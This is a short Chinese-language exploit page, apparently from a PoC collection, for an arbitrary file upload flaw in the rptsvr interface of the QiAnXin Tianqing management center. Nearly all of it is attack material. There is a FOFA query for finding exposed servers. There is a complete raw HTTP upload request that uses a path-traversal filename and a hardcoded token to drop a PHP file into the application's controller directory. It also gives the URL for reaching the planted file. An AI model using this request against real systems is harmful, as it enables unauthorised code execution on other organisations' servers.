44 lines
1.6 KiB
Markdown
44 lines
1.6 KiB
Markdown
|
## 奇安信天擎rptsvr任意文件上传
|
|||
|
|
|
|||
|
|
奇安信 天擎管理中心 <=V6.7.0.4130 版本的rptsvr接口存在任意文件上传漏洞,可上传恶意至服务器,执行脚本文件。
|
|||
|
|
|
|||
|
|
## fofa
|
|||
|
|
```
|
|||
|
|
banner="QiAnXin web server" || banner="360 web server" || body="appid\":\"skylar6" || body="/task/index/detail?id={item.id}" || body="已过期或者未授权,购买请联系4008-136-360"
|
|||
|
|
```
|
|||
|
|
|
|||
|
|
## poc
|
|||
|
|
```
|
|||
|
|
POST /rptsvr/upload HTTP/1.1
|
|||
|
|
Host:
|
|||
|
|
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36
|
|||
|
|
Connection: close
|
|||
|
|
Content-Length: 414
|
|||
|
|
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
|
|||
|
|
Accept-Encoding: gzip, deflate, br
|
|||
|
|
Accept-Language: en-US,en;q=0.5
|
|||
|
|
Content-Type: multipart/form-data;boundary=---------------------------55433477442814818502792421460
|
|||
|
|
Upgrade-Insecure-Requests: 1
|
|||
|
|
|
|||
|
|
-----------------------------55433477442814818502792421460
|
|||
|
|
Content-Disposition: form-data; name="uploadfile"; filename="../../../application/api/controllers/TController2.php"
|
|||
|
|
Content-Type: text/x-python
|
|||
|
|
|
|||
|
|
<?php
|
|||
|
|
phpinfo();
|
|||
|
|
?>
|
|||
|
|
-----------------------------55433477442814818502792421460
|
|||
|
|
Content-Disposition: form-data; name="token"
|
|||
|
|
|
|||
|
|
skylar_report
|
|||
|
|
-----------------------------55433477442814818502792421460
|
|||
|
|
```
|
|||
|
|
|
|||
|
|
|
|||
|
|
|
|||
|
|
#### 访问上传文件路径如下:
|
|||
|
|
`http://xxxx/application/api/controllers/TController2.php`
|
|||
|
|
|
|||
|
|
|
|||
|
|
|